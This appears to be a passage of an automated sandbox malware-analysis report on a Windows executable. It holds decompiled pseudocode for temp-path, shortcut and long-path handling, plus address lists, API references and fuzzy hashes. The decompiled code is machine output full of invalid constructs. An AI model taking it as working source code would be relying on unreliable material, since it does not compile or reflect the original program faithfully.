											__eax = E00B6B6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
										}
										__ebp - 0xb894 = __ebp - 0x688c;
										__eax = E00B6B6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
										__eflags =  *(__ebp - 0x2844);
										if(__eflags == 0) {
											__ebp - 0x2844 = E00B7B425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
										}
										__ebp - 0x2844 = E00B6B690(__eflags, __ebp - 0x2844, __esi);
										__eflags =  *((short*)(__ebp - 0x17894));
										if(__eflags != 0) {
											__ebp - 0x17894 = __ebp - 0x2844;
											E00B705DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
											__eax = E00B6B690(__eflags, __ebp - 0x2844, __esi);
										}
										__ebp - 0x2844 = __ebp - 0xc894;
										__eax = E00B70602(__ebp - 0xc894, __ebp - 0x2844, __esi);
										__eflags =  *(__ebp - 0x13894);
										__eax = __ebp - 0x13894;
										if(__eflags == 0) {
											__eax = __ebp - 0x19894;
										}
										__ebp - 0x2844 = E00B705DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
										__eax = __ebp - 0x2844;
										__eflags = E00B6B92D(__ebp - 0x2844);
										if(__eflags == 0) {
											L170:
											__ebp - 0x2844 = E00B705DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
											goto L171;
										} else {
											L169:
											__eflags = __eax;
											if(__eflags == 0) {
												L171:
												__ebx = 0;
												__ebp - 0x2844 = E00B6A0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
												__ebp - 0xb894 = __ebp - 0xa894;
												E00B70602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
												__eax = E00B6C2E4(__eflags, __ebp - 0xa894);
												__esi =  *(__ebp - 0x1844) & 0x0000ffff;
												__eax = __ebp - 0x1844;
												__edx =  *(__ebp - 0x9894) & 0x0000ffff;
												__edi = __ebp - 0xa894;
												__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
												asm("sbb esi, esi");
												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
												__eax = __ebp - 0x9894;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
												__eax = __ebp - 0x15894;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
												 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
												asm("sbb eax, eax");
												 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
												__ebp - 0xb894 = E00B7A48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
												__eflags =  *(__ebp - 0xc894) - __bx;
												if( *(__ebp - 0xc894) != __bx) {
													_push(0);
													__eax = __ebp - 0xc894;
													_push(__ebp - 0xc894);
													_push(5);
													_push(0x1000);
													__eax =  *0xbc308c();
												}
												goto L175;
											}
											goto L170;
										}
									}
								case 0xa:
									L173:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xbaa470 = 1;
									}
									goto L175;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eax = E00B879E9( *(__ebp - 0x588c) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xba8461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xba8462 = 1;
										} else {
											__eax = 0;
											 *0xba8461 = __al;
											 *0xba8462 = __al;
										}
									}
									goto L175;
								case 0xc:
									L104:
									 *0xbb7b7a = 1;
									__eax = __eax + 0xbb7b7a;
									_t117 = __esi + 0x39;
									 *_t117 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t117;
									__ebp = 0xffffa774;
									if( *_t117 != 0) {
										_t119 = __ebp - 0x588c; // 0xffff4ee8
										__eax = _t119;
										 *0xb9e728 = E00B71FA7(_t119);
									}
									goto L175;
							}
							L2:
							_push(0x1000);
							_push(_t294);
							_push(_t226);
							_t226 = E00B7AF98();
							_t294 = _t294 + 0x2000;
							_t292 = _t292 - 1;
							if(_t292 != 0) {
								goto L2;
							} else {
								_t295 = _t292;
								goto L4;
							}
						}
						L176:
						 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
						return _t225;
					}
					L111:
					__eflags =  *0xbac575 - __bl;
					if( *0xbac575 != __bl) {
						goto L175;
					}
					L112:
					__eax = 0;
					 *(__ebp - 0x444) = __ax;
					__eax = __ebp - 0x588c;
					_push(__ebp - 0x588c);
					__eax = E00B822C6(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L119:
						__eflags =  *(__ebp - 0x444) - __bx;
						if( *(__ebp - 0x444) == __bx) {
							__ebp - 0x1b894 = __ebp - 0x588c;
							E00B70602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
							__ebp - 0x444 = E00B70602(__ebp - 0x444, __ebp - 0x19894, 0x200);
						}
						__ebp - 0x588c = E00B7ADD2(__ebp - 0x588c);
						__eax = 0;
						 *(__ebp - 0x488c) = __ax;
						__ebp - 0x444 = __ebp - 0x588c;
						__eax = E00B7A7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
						__eflags = __eax - 6;
						if(__eax != 6) {
							__eax = 0;
							 *0xba8454 = 1;
							 *0xba946a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
						}
						goto L175;
					}
					L113:
					__ax =  *(__ebp - 0x588c);
					__esi = __ebx;
					__eflags = __ax;
					if(__ax == 0) {
						goto L119;
					}
					L114:
					__ecx = __ax & 0x0000ffff;
					while(1) {
						L115:
						__eflags = __cx - 0x40;
						if(__cx == 0x40) {
							break;
						}
						L116:
						__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
						__esi =  &(__esi->i);
						__ecx = __eax;
						__eflags = __ax;
						if(__ax != 0) {
							continue;
						}
						L117:
						goto L119;
					}
					L118:
					__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
					__ebp - 0x444 = E00B70602(__ebp - 0x444, __ebp - 0x444, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x588c) = __ax;
					goto L119;
					L123:
					__eflags = __ebx - 7;
					if(__ebx == 7) {
						__eflags =  *0xbaa46c - 0x800;
						if( *0xbaa46c == 0x800) {
							 *0xbaa46c = 2;
						}
						 *0xba9468 = 1;
					}
					goto L175;
				}
			}

0x00b7ce87
0x00b7ce87
0x00b7ce87
0x00b7ce8a
0x00000000
0x00000000
0x00b7ce90
0x00b7ce90
0x00b7ce96
0x00b7cea4
0x00b7ceab
0x00b7ceb0
0x00b7ceb2
0x00b7ceb4
0x00b7ceb9
0x00b7ceb9
0x00b7ceb9
0x00b7ced1
0x00b7cede
0x00b7cee3
0x00b7cee5
0x00000000
0x00000000
0x00b7ceb7
0x00b7ceb7
0x00b7ceb7
0x00b7ceb8
0x00b7ceb8
0x00b7cee7
0x00b7cef1
0x00b7cef7
0x00b7cefe
0x00b7d3d9
0x00b7d3d9
0x00b7d3d9
0x00b7d3de
0x00b7d3e2
0x00b7d3e6
0x00b7d3ed
0x00b7d3f4
0x00b7d3f7
0x00b7d3fc
0x00b7d3ff
0x00b7d404
0x00b7c795
0x00b7c79b
0x00b7c7a1
0x00b7c7a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7c7bb
0x00b7c7d2
0x00b7c7d6
0x00000000
0x00b7c7d8
0x00000000
0x00b7c7d8
0x00b7c7d6
0x00b7c7dd
0x00b7c7e0
0x00000000
0x00000000
0x00b7c7e6
0x00b7c7e6
0x00000000
0x00b7c7ed
0x00b7c7ed
0x00b7c7f0
0x00b7c803
0x00b7c829
0x00b7c83d
0x00b7c840
0x00b7c84b
0x00b7c98f
0x00b7c98f
0x00b7c98f
0x00b7c99d
0x00b7c9a2
0x00b7c9a4
0x00000000
0x00000000
0x00b7c855
0x00b7c85d
0x00b7c863
0x00b7c869
0x00b7c90f
0x00b7c916
0x00b7c91c
0x00b7c91f
0x00000000
0x00000000
0x00b7c921
0x00b7c928
0x00b7c92e
0x00b7c930
0x00000000
0x00b7c932
0x00b7c932
0x00b7c934
0x00b7c935
0x00b7c939
0x00b7c94d
0x00b7c952
0x00b7c95c
0x00b7c962
0x00b7c965
0x00b7c937
0x00b7c937
0x00b7c938
0x00000000
0x00b7c967
0x00b7c975
0x00b7c97b
0x00b7c97d
0x00b7c989
0x00b7c989
0x00000000
0x00b7c97d
0x00b7c965
0x00b7c930
0x00b7c86f
0x00b7c87e
0x00b7c88b
0x00b7c89c
0x00b7c89f
0x00b7c8a2
0x00b7c8b5
0x00b7c8bc
0x00b7c8c1
0x00b7c8c3
0x00000000
0x00000000
0x00b7c8c9
0x00b7c8d0
0x00b7c8d5
0x00b7c8da
0x00b7c8e6
0x00b7c8eb
0x00b7c8ee
0x00b7c8f5
0x00b7c8f7
0x00b7c8f8
0x00b7c902
0x00b7c908
0x00b7c909
0x00000000
0x00b7c909
0x00b7c8a4
0x00b7c8ab
0x00b7c8b1
0x00b7c8b3
0x00000000
0x00000000
0x00000000
0x00b7c8b3
0x00b7c9aa
0x00b7c9aa
0x00b7c9b4
0x00b7c9b4
0x00000000
0x00000000
0x00b7c9be
0x00b7c9be
0x00b7c9c0
0x00000000
0x00b7c9c6
0x00b7c9c6
0x00b7c9cb
0x00b7c9cd
0x00b7c9d0
0x00b7c9d2
0x00b7c9df
0x00b7c9e4
0x00b7c9e5
0x00b7c9e5
0x00b7c9e6
0x00b7c9e9
0x00b7c9eb
0x00b7c9f5
0x00b7c9f8
0x00b7c9fe
0x00b7ca00
0x00b7c9ed
0x00b7c9ed
0x00b7c9ed
0x00b7ca05
0x00b7ca07
0x00b7ca10
0x00b7ca10
0x00b7ca12
0x00b7ca13
0x00b7ca18
0x00b7ca21
0x00b7ca22
0x00b7ca28
0x00b7ca2d
0x00b7ca30
0x00b7ca32
0x00b7ca4b
0x00b7ca4b
0x00b7ca4d
0x00b7ca54
0x00b7ca59
0x00000000
0x00b7ca4d
0x00b7ca34
0x00b7ca34
0x00b7ca39
0x00b7ca3b
0x00b7ca3d
0x00b7ca3d
0x00b7ca3f
0x00b7ca3f
0x00b7ca42
0x00b7ca44
0x00b7ca49
0x00b7ca4a
0x00000000
0x00b7ca4a
0x00000000
0x00b7ca5f
0x00b7ca5f
0x00b7ca61
0x00b7ca71
0x00b7ca71
0x00000000
0x00000000
0x00b7ca7c
0x00b7ca7c
0x00b7ca7e
0x00000000
0x00000000
0x00b7ca84
0x00b7ca84
0x00b7ca8b
0x00000000
0x00000000
0x00b7ca91
0x00b7ca91
0x00b7ca93
0x00b7ca99
0x00b7ca9b
0x00b7caa2
0x00b7caa3
0x00b7caaa
0x00b7caac
0x00b7caac
0x00b7cab3
0x00b7cab8
0x00b7cabe
0x00b7cac0
0x00000000
0x00b7cac6
0x00b7cac6
0x00b7cac6
0x00b7cac9
0x00b7cacb
0x00b7cacc
0x00b7cacf
0x00b7caf8
0x00b7caf8
0x00b7cafb
0x00b7cbe0
0x00b7cbe9
0x00b7cbee
0x00b7cbee
0x00b7cbf0
0x00b7cbf0
0x00b7cbf2
0x00b7cbf4
0x00b7cbfb
0x00b7cc00
0x00b7cc01
0x00b7cc02
0x00b7cc04
0x00b7cc06
0x00b7cc0a
0x00b7cc0c
0x00b7cc0c
0x00b7cc0e
0x00b7cc0e
0x00b7cc0a
0x00b7cc12
0x00b7cc18
0x00b7cc25
0x00b7cc2c
0x00b7cc3c
0x00b7cc46
0x00b7cc54
0x00b7cc5a
0x00b7cc62
0x00b7cc67
0x00b7cc68
0x00b7cc69
0x00b7cc6b
0x00b7cc7f
0x00b7cc7f
0x00000000
0x00b7cc6b
0x00b7cb01
0x00b7cb01
0x00b7cb04
0x00b7cb11
0x00b7cb11
0x00b7cb14
0x00b7cb16
0x00b7cb17
0x00b7cb19
0x00b7cb1a
0x00b7cb1f
0x00b7cb24
0x00b7cb2a
0x00b7cb2c
0x00b7cb2e
0x00b7cb31
0x00b7cb38
0x00b7cb39
0x00b7cb3f
0x00b7cb40
0x00b7cb43
0x00b7cb44
0x00b7cb45
0x00b7cb4a
0x00b7cb4d
0x00b7cb53
0x00b7cb5c
0x00b7cb5f
0x00b7cb64
0x00b7cb66
0x00b7cb68
0x00b7cb6a
0x00b7cb6a
0x00b7cb6c
0x00b7cb6c
0x00b7cb6e
0x00b7cb6e
0x00b7cb76
0x00b7cb7d
0x00b7cb7f
0x00b7cb86
0x00b7cb8c
0x00b7cb8e
0x00b7cb8f
0x00b7cb97
0x00b7cba6
0x00b7cba6
0x00b7cb97
0x00b7cbb1
0x00b7cbb3
0x00b7cbc2
0x00b7cbc8
0x00b7cbce
0x00b7cbd9
0x00b7cbd9
0x00000000
0x00b7cbce
0x00b7cb06
0x00b7cb06
0x00b7cb0b
0x00000000
0x00000000
0x00000000
0x00b7cb0b
0x00b7cad1
0x00b7cad1
0x00b7cad5
0x00000000
0x00000000
0x00b7cad7
0x00b7cad7
0x00b7cada
0x00b7cadc
0x00b7cadf
0x00000000
0x00000000
0x00b7cae5
0x00b7caee
0x00000000
0x00b7caee
0x00000000
0x00b7cc8a
0x00b7cc8a
0x00b7cc8b
0x00b7cc90
0x00b7cc92
0x00b7cc95
0x00b7cc95
0x00000000
0x00b7cccb
0x00b7cccb
0x00b7ccd2
0x00b7ccd4
0x00b7ccd4
0x00b7ccd6
0x00b7cd05
0x00b7cd05
0x00b7cd0b
0x00000000
0x00b7cd0b
0x00b7ccd8
0x00b7ccd8
0x00b7ccd8
0x00b7ccdb
0x00b7ccf4
0x00b7ccf4
0x00b7ccfa
0x00b7ccfa
0x00000000
0x00b7ccfa
0x00b7ccdd
0x00b7ccdd
0x00b7ccdd
0x00b7cce0
0x00000000
0x00000000
0x00b7cce2
0x00b7cce2
0x00b7cce2
0x00b7cce5
0x00000000
0x00000000
0x00b7cceb
0x00b7cceb
0x00000000
0x00000000
0x00b7cd58
0x00b7cd58
0x00b7cd5a
0x00b7cd61
0x00b7cd62
0x00b7cd68
0x00b7cd70
0x00b7cd72
0x00b7cd75
0x00b7ce25
0x00b7ce25
0x00b7ce29
0x00b7ce38
0x00b7ce38
0x00b7ce3c
0x00000000
0x00000000
0x00b7ce42
0x00b7ce42
0x00b7ce45
0x00000000
0x00000000
0x00b7ce4b
0x00b7ce4b
0x00b7ce4b
0x00b7ce4d
0x00b7ce4e
0x00b7ce4e
0x00b7ce4f
0x00b7ce50
0x00b7ce53
0x00000000
0x00b7ce53
0x00b7ce2b
0x00b7ce2b
0x00b7ce2e
0x00000000
0x00000000
0x00b7ce34
0x00b7ce34
0x00000000
0x00b7ce34
0x00b7cd7b
0x00b7cd7b
0x00b7cd81
0x00b7cd83
0x00b7cd84
0x00b7cd89
0x00b7cd8a
0x00b7cd8b
0x00b7cd8d
0x00b7ce22
0x00b7ce22
0x00000000
0x00b7ce22
0x00b7cd93
0x00b7cd93
0x00b7cd93
0x00b7cd96
0x00b7cd99
0x00b7cd9b
0x00b7cd9e
0x00b7cda4
0x00b7cda6
0x00b7cda7
0x00b7cdad
0x00b7cdae
0x00b7cdb3
0x00b7cdb6
0x00b7cdb8
0x00000000
0x00000000
0x00b7cdba
0x00b7cdba
0x00b7cdbc
0x00b7cdbc
0x00b7cdbc
0x00b7cdc4
0x00000000
0x00000000
0x00b7cdc6
0x00b7cdcb
0x00b7cdd2
0x00b7cdd7
0x00b7cdde
0x00b7cde0
0x00b7cde2
0x00b7cde9
0x00b7cdee
0x00b7cdf0
0x00b7cdf2
0x00b7cdf4
0x00b7cdf4
0x00b7cdfa
0x00b7ce01
0x00b7ce06
0x00b7ce08
0x00b7ce0a
0x00b7ce0c
0x00b7ce0c
0x00b7ce0d
0x00b7ce0f
0x00b7ce15
0x00b7ce16
0x00b7ce1c
0x00b7ce1e
0x00b7ce20
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7ce20
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7d030
0x00b7d030
0x00b7d033
0x00b7d035
0x00b7d03c
0x00b7d03e
0x00b7d044
0x00b7d045
0x00b7d04a
0x00b7d04b
0x00b7d04b
0x00b7d050
0x00b7d053
0x00b7d059
0x00b7d059
0x00b7d05e
0x00000000
0x00000000
0x00b7d06a
0x00b7d06a
0x00b7d06d
0x00000000
0x00000000
0x00b7d073
0x00b7d073
0x00b7d075
0x00b7d07c
0x00b7d084
0x00b7d08a
0x00b7d08d
0x00b7d0b0
0x00b7d0b7
0x00b7d08f
0x00b7d08f
0x00b7d092
0x00b7d0a2
0x00b7d0a9
0x00b7d094
0x00b7d094
0x00b7d09b
0x00b7d09b
0x00b7d092
0x00b7d0bc
0x00b7d0ca
0x00b7d0cf
0x00b7d0d1
0x00b7d0d8
0x00b7d0e7
0x00b7d0ee
0x00b7d0f3
0x00b7d0f5
0x00b7d0f6
0x00b7d0fd
0x00b7d149
0x00b7d150
0x00b7d155
0x00b7d157
0x00000000
0x00000000
0x00b7d15d
0x00b7d15d
0x00b7d164
0x00b7d16a
0x00b7d16c
0x00b7d16f
0x00b7d221
0x00b7d221
0x00000000
0x00b7d221
0x00b7d175
0x00b7d175
0x00b7d178
0x00b7d178
0x00b7d178
0x00b7d17a
0x00b7d17b
0x00b7d17e
0x00b7d188
0x00b7d188
0x00b7d18a
0x00b7d194
0x00b7d199
0x00b7d19b
0x00b7d1fd
0x00b7d1fd
0x00000000
0x00b7d1fd
0x00b7d19d
0x00b7d1a4
0x00b7d1aa
0x00b7d1af
0x00b7d1b1
0x00000000
0x00000000
0x00b7d1b3
0x00b7d1b3
0x00b7d1b5
0x00b7d1b6
0x00b7d1b9
0x00b7d1bb
0x00b7d1be
0x00b7d1d4
0x00b7d1d4
0x00b7d1d6
0x00b7d1d8
0x00b7d1de
0x00b7d1de
0x00b7d1de
0x00b7d1e1
0x00000000
0x00000000
0x00b7d1db
0x00b7d1db
0x00b7d1db
0x00b7d1db
0x00b7d1e3
0x00b7d1e3
0x00b7d1e9
0x00b7d1eb
0x00b7d1f0
0x00b7d1f3
0x00b7d1f8
0x00000000
0x00b7d1f8
0x00b7d1c0
0x00b7d1c0
0x00b7d1c7
0x00b7d1cc
0x00000000
0x00b7d1cc
0x00b7d180
0x00b7d180
0x00b7d182
0x00b7d183
0x00b7d186
0x00000000
0x00000000
0x00000000
0x00b7d200
0x00b7d200
0x00b7d203
0x00b7d206
0x00b7d208
0x00b7d208
0x00b7d211
0x00b7d216
0x00b7d218
0x00b7d21a
0x00b7d21c
0x00b7d21c
0x00000000
0x00b7d0ff
0x00b7d0ff
0x00b7d107
0x00b7d113
0x00b7d119
0x00b7d11a
0x00b7d11b
0x00b7d120
0x00b7d121
0x00b7d122
0x00b7d124
0x00b7d12a
0x00b7d12c
0x00b7d13f
0x00b7d13f
0x00b7d226
0x00b7d226
0x00b7d22e
0x00b7d238
0x00b7d23f
0x00b7d23f
0x00b7d24c
0x00b7d253
0x00b7d258
0x00b7d260
0x00b7d26c
0x00b7d26c
0x00b7d279
0x00b7d27e
0x00b7d286
0x00b7d290
0x00b7d29d
0x00b7d2a4
0x00b7d2a4
0x00b7d2b1
0x00b7d2b8
0x00b7d2bd
0x00b7d2c5
0x00b7d2cb
0x00b7d2cd
0x00b7d2cd
0x00b7d2e2
0x00b7d2e7
0x00b7d2f3
0x00b7d2f5
0x00b7d306
0x00b7d313
0x00000000
0x00b7d2f7
0x00b7d2f7
0x00b7d302
0x00b7d304
0x00b7d318
0x00b7d318
0x00b7d324
0x00b7d331
0x00b7d33d
0x00b7d344
0x00b7d349
0x00b7d350
0x00b7d356
0x00b7d35d
0x00b7d363
0x00b7d36a
0x00b7d36c
0x00b7d36e
0x00b7d370
0x00b7d372
0x00b7d378
0x00b7d37a
0x00b7d37c
0x00b7d37e
0x00b7d384
0x00b7d386
0x00b7d390
0x00b7d393
0x00b7d399
0x00b7d3a8
0x00b7d3ad
0x00b7d3b4
0x00b7d3b6
0x00b7d3b7
0x00b7d3bd
0x00b7d3be
0x00b7d3c0
0x00b7d3c5
0x00b7d3c5
0x00000000
0x00b7d3b4
0x00000000
0x00b7d304
0x00b7d2f5
0x00000000
0x00b7d3cd
0x00b7d3cd
0x00b7d3d0
0x00b7d3d2
0x00b7d3d2
0x00000000
0x00000000
0x00b7cd17
0x00b7cd17
0x00b7cd1f
0x00b7cd25
0x00b7cd28
0x00b7cd4c
0x00b7cd2a
0x00b7cd2a
0x00b7cd2d
0x00b7cd40
0x00b7cd2f
0x00b7cd2f
0x00b7cd31
0x00b7cd36
0x00b7cd36
0x00b7cd2d
0x00000000
0x00000000
0x00b7ce5d
0x00b7ce5d
0x00b7ce5e
0x00b7ce63
0x00b7ce63
0x00b7ce63
0x00b7ce66
0x00b7ce6b
0x00b7ce71
0x00b7ce71
0x00b7ce7d
0x00b7ce7d
0x00000000
0x00000000
0x00b7c7a2
0x00b7c7a2
0x00b7c7a7
0x00b7c7a8
0x00b7c7a9
0x00b7c7ae
0x00b7c7b4
0x00b7c7b7
0x00000000
0x00b7c7b9
0x00b7c7b9
0x00000000
0x00b7c7b9
0x00b7c7b7
0x00b7d40a
0x00b7d410
0x00b7d418
0x00b7d418
0x00b7cf04
0x00b7cf04
0x00b7cf0a
0x00000000
0x00000000
0x00b7cf10
0x00b7cf10
0x00b7cf12
0x00b7cf19
0x00b7cf21
0x00b7cf22
0x00b7cf27
0x00b7cf28
0x00b7cf29
0x00b7cf2b
0x00b7cf7b
0x00b7cf7b
0x00b7cf82
0x00b7cf90
0x00b7cfa1
0x00b7cfaf
0x00b7cfaf
0x00b7cfbb
0x00b7cfc0
0x00b7cfc2
0x00b7cfd2
0x00b7cfdc
0x00b7cfe1
0x00b7cfe4
0x00b7cfef
0x00b7cff1
0x00b7cff8
0x00b7cffe
0x00b7cffe
0x00000000
0x00b7cfe4
0x00b7cf2d
0x00b7cf2d
0x00b7cf34
0x00b7cf36
0x00b7cf39
0x00000000
0x00000000
0x00b7cf3b
0x00b7cf3b
0x00b7cf3e
0x00b7cf3e
0x00b7cf3e
0x00b7cf42
0x00000000
0x00000000
0x00b7cf44
0x00b7cf44
0x00b7cf4c
0x00b7cf4d
0x00b7cf4f
0x00b7cf52
0x00000000
0x00000000
0x00b7cf54
0x00000000
0x00b7cf54
0x00b7cf56
0x00b7cf61
0x00b7cf6c
0x00b7cf71
0x00b7cf71
0x00b7cf73
0x00000000
0x00b7d009
0x00b7d009
0x00b7d00c
0x00b7d012
0x00b7d018
0x00b7d01a
0x00b7d01a
0x00b7d024
0x00b7d024
0x00000000
0x00b7d00c

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00B7CE9D

Part of subcall function 00B6B690: _wcslen.LIBCMT ref: 00B6B696

_swprintf.LIBCMT ref: 00B7CED1

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

SetDlgItemTextW.USER32(?,00000066,00BA946A), ref: 00B7CEF1
EndDialog.USER32(?,00000001), ref: 00B7CFFE

Strings

%s%s%u, xrefs: 00B7CEC6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 1ed8042374ba23d051b378b8f0488ace95396e2b295986a7a5349d6cc9a47fe6
Instruction ID: c7e19ace63c8533619f2f3a5caf1afb9ab87da49a529d2f999c96602165f8046
Opcode Fuzzy Hash: 1ed8042374ba23d051b378b8f0488ace95396e2b295986a7a5349d6cc9a47fe6
Instruction Fuzzy Hash: 06415DB1900258AADF259BA0CC45EEE77FCEB05340F40C0EAFA1DE7151EE749A849F65

Uniqueness

Uniqueness Score: -1.00%

Function 00B6BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B6BB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				void* _t32;
				long _t34;
				void* _t40;
				void* _t55;
				signed short* _t62;
				void* _t65;
				intOrPtr _t67;
				signed short* _t68;
				intOrPtr _t69;

				E00B7EC50(0x1000);
				_t68 = _a4;
				_t70 =  *_t68;
				if( *_t68 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				E00B6BC98(_t70, _t68);
				_t65 = E00B83E13(_t68);
				_t32 = E00B6BCC3(_t68);
				_t71 = _t32;
				if(_t32 == 0) {
					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
					__eflags = _t34;
					if(_t34 == 0) {
						goto L21;
					}
					__eflags = _t34 - 0x7ff;
					if(_t34 > 0x7ff) {
						goto L21;
					}
					__eflags = E00B6BD9D( *_t68 & 0x0000ffff);
					if(__eflags == 0) {
						E00B6B690(__eflags,  &_v4100, 0x800);
						_t40 = E00B83E13( &_v4100);
						_t67 = _a12;
						__eflags = _t67 - _t40 + _t65 + 4;
						if(_t67 <= _t40 + _t65 + 4) {
							goto L21;
						}
						E00B70602(_a8, L"\\\\?\\", _t67);
						E00B705DA(__eflags, _a8,  &_v4100, _t67);
						__eflags =  *_t68 - 0x2e;
						if(__eflags == 0) {
							__eflags = E00B6BD9D(_t68[1] & 0x0000ffff);
							if(__eflags != 0) {
								_t68 =  &(_t68[2]);
							}
						}
						L16:
						_push(_t67);
						L5:
						_push(_t68);
						L6:
						_push(_a8);
						E00B705DA(_t73);
						return 1;
					}
					_t14 = _t65 + 6; // 0x6
					_t67 = _a12;
					__eflags = _t67 - _t14;
					if(_t67 <= _t14) {
						goto L21;
					}
					E00B70602(_a8, L"\\\\?\\", _t67);
					__eflags = 0;
					_v4096 = 0;
					E00B705DA(0, _a8,  &_v4100, _t67);
					goto L16;
				}
				if(E00B6BC98(_t71, _t68) == 0) {
					_t55 = 0x5c;
					__eflags =  *_t68 - _t55;
					if( *_t68 != _t55) {
						goto L21;
					}
					_t62 =  &(_t68[1]);
					__eflags =  *_t62 - _t55;
					if( *_t62 != _t55) {
						goto L21;
					}
					_t69 = _a12;
					_t10 = _t65 + 6; // 0x6
					__eflags = _t69 - _t10;
					if(_t69 <= _t10) {
						goto L21;
					}
					E00B70602(_a8, L"\\\\?\\", _t69);
					E00B705DA(__eflags, _a8, L"UNC", _t69);
					_push(_t69);
					_push(_t62);
					goto L6;
				}
				_t2 = _t65 + 4; // 0x4
				_t73 = _a12 - _t2;
				if(_a12 <= _t2) {
					goto L21;
				} else {
					E00B70602(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L5;
				}
			}

0x00b6bb0b
0x00b6bb12
0x00b6bb16
0x00b6bb1a
0x00b6bc84
0x00b6bc84
0x00000000
0x00b6bc84
0x00b6bb21
0x00b6bb2e
0x00b6bb30
0x00b6bb35
0x00b6bb37
0x00b6bbc5
0x00b6bbcb
0x00b6bbcd
0x00000000
0x00000000
0x00b6bbd3
0x00b6bbd5
0x00000000
0x00000000
0x00b6bbe4
0x00b6bbe6
0x00b6bc2f
0x00b6bc3b
0x00b6bc45
0x00b6bc49
0x00b6bc4b
0x00000000
0x00000000
0x00b6bc56
0x00b6bc66
0x00b6bc6b
0x00b6bc6f
0x00b6bc7b
0x00b6bc7d
0x00b6bc7f
0x00b6bc7f
0x00b6bc7d
0x00b6bc1d
0x00b6bc1d
0x00b6bb62
0x00b6bb62
0x00b6bb63
0x00b6bb63
0x00b6bb66
0x00000000
0x00b6bb6b
0x00b6bbe8
0x00b6bbeb
0x00b6bbee
0x00b6bbf0
0x00000000
0x00000000
0x00b6bbff
0x00b6bc04
0x00b6bc06
0x00b6bc18
0x00000000
0x00b6bc18
0x00b6bb41
0x00b6bb74
0x00b6bb75
0x00b6bb78
0x00000000
0x00000000
0x00b6bb7e
0x00b6bb81
0x00b6bb84
0x00000000
0x00000000
0x00b6bb8a
0x00b6bb8d
0x00b6bb90
0x00b6bb92
0x00000000
0x00000000
0x00b6bba1
0x00b6bbaf
0x00b6bbb4
0x00b6bbb5
0x00000000
0x00b6bbb5
0x00b6bb43
0x00b6bb46
0x00b6bb49
0x00000000
0x00b6bb4f
0x00b6bb5a
0x00b6bb5f
0x00000000
0x00b6bb5f

APIs

_wcslen.LIBCMT ref: 00B6BB27
